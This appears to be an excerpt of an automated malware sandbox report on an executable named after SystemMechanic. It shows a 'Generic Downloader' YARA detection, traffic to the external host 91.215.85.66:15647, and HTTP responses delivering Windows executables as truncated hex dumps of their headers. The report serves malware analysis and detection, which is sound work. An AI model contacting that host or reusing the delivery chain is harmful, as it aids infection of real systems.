Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49866

Yara detected Generic Downloader

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be8eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195248d0000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.4:49757 -> 91.215.85.66:15647

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 08:26:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 26 Apr 2024 08:15:01 GMTETag: "41600-616fb8011d9a7"Accept-Ranges: bytesContent-Length: 267776Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 d0 c0 c8 ed b1 ae 9b ed b1 ae 9b ed b1 ae 9b e0 e3 71 9b f1 b1 ae 9b e0 e3 4e 9b 92 b1 ae 9b e0 e3 4f 9b c2 b1 ae 9b e4 c9 3d 9b ee b1 ae 9b ed b1 af 9b 81 b1 ae 9b 58 2f 4b 9b ec b1 ae 9b e0 e3 75 9b ec b1 ae 9b 58 2f 70 9b ec b1 ae 9b 52 69 63 68 ed b1 ae 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 61 16 78 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 02 01 00 00 ec c1 03 00 00 00 00 57 44 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 c3 03 00 04 00 00 14 fd 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 83 01 00 28 00 00 00 00 30 c2 03 f8 d5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c3 03 80 13 00 00 f0 21 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 00 01 00 00 10 00 00 00 02 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 6c 00 00 00 20 01 00 00 6e 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 92 c0 03 00 90 01 00 00 b8 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 d5 00 00 00 30 c2 03 00 d6 00 00 00 2c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 c3 03 00 14 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 08:27:03 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 08:27:08 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 08:27:09 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 08:27:10 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 08:27:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 